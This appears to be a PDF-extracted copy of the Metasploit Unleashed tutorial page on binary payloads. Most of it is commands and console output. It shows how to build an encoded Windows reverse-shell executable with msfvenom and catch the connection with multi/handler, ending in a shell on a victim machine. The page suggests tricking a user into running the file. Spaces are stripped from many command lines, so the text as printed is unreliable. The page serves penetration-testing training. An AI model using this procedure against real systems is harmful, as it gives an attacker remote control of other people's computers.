Académique Documents
Professionnel Documents
Culture Documents
BinaryPayloadsMetasploitUnleashed
BinaryPayloads
It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an
executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you
can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any
software.
Lets look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a
remote system, and get our shell. To do this we will use the command line tool msfvenom. This command can
be used for generating payloads to be used in many locations and o ers a variety of output options, from perl
to C to raw. We are interested in the executable output, which is provided by the -f exe option.
Well generate a Windows reverse shell executable that will connect back to us on port 31337.
root@kali:~#msfvenompayloadoptionspwindows/shell/reverse_tcp
Optionsforpayload/windows/shell/reverse_tcp:
Name:WindowsCommandShell,ReverseTCPStager
Module:payload/windows/shell/reverse_tcp
Platform:Windows
Arch:x86
NeedsAdmin:No
Totalsize:281
Rank:Normal
Providedby:
spoonm
sf
hdm
skape
Basicoptions:
NameCurrentSettingRequiredDescription
EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)
LHOSTyesThelistenaddress
LPORT4444yesThelistenport
Description:
Spawnapipedcommandshell(staged).Connectbacktotheattacker
root@kali:~#msfvenomax86platformwindowspwindows/shell/reverse_tcpLHOST=192.168.1.101LPORT=3333b"\
Found1compatibleencoders
https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/
1/4
09/01/2017
BinaryPayloadsMetasploitUnleashed
Attemptingtoencodepayloadwith1iterationsofx86/shikata_ga_nai
x86/shikata_ga_naisucceededwithsize326(iteration=0)
x86/shikata_ga_naichosenwithfinalsize326
Payloadsize:326bytes
Savedas:/tmp/1.exe
root@kali:~#file/tmp/1.exe
/tmp/1.exe:PE32executable(GUI)Intel80386,forMSWindows
Ok, now we see we have a windows executable ready to go. Now, we will use multi/handler which is a stub
that handles exploits launched outside of the framework.
root@kali:~#msfconsoleq
msf>useexploit/multi/handler
msfexploit(handler)>showoptions
Moduleoptions:
NameCurrentSettingRequiredDescription
Exploittarget:
IdName
0WildcardTarget
When using the exploit/multi/handler module, we still need to tell it which payload to expect so we con gure
it to have the same settings as the executable we generated.
msfexploit(handler)>setpayloadwindows/shell/reverse_tcp
payload=>windows/shell/reverse_tcp
msfexploit(handler)>showoptions
Moduleoptions:
NameCurrentSettingRequiredDescription
Payloadoptions(windows/shell/reverse_tcp):
NameCurrentSettingRequiredDescription
EXITFUNCthreadyesExittechnique:seh,thread,process
LHOSTyesThelocaladdress
LPORT4444yesThelocalport
https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/
2/4
09/01/2017
BinaryPayloadsMetasploitUnleashed
Exploittarget:
IdName
0WildcardTarget
msfexploit(handler)>setLHOST172.16.104.130
LHOST=>172.16.104.130
msfexploit(handler)>setLPORT31337
LPORT=>31337
msfexploit(handler)>
Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our
generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.
msfexploit(handler)>exploit
[*]HandlerbindingtoLHOST0.0.0.0
[*]Startedreversehandler
[*]Startingthepayloadhandler...
[*]Sendingstage(474bytes)
[*]Commandshellsession2opened(172.16.104.130:31337>172.16.104.128:1150)
MicrosoftWindowsXP[Version5.1.2600]
(C)Copyright19852001MicrosoftCorp.
C:\DocumentsandSettings\Victim\MyDocuments>
MSFUNavigation
Metasploit Unleashed
Information Gathering
Introduction
Vulnerability Scanning
Metasploit Fundamentals
Exploit Development
Meterpreter Scripting
Maintaining Access
https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/
Recent Changes
3/4
09/01/2017
BinaryPayloadsMetasploitUnleashed
https://www.offensivesecurity.com/metasploitunleashed/binarypayloads/
4/4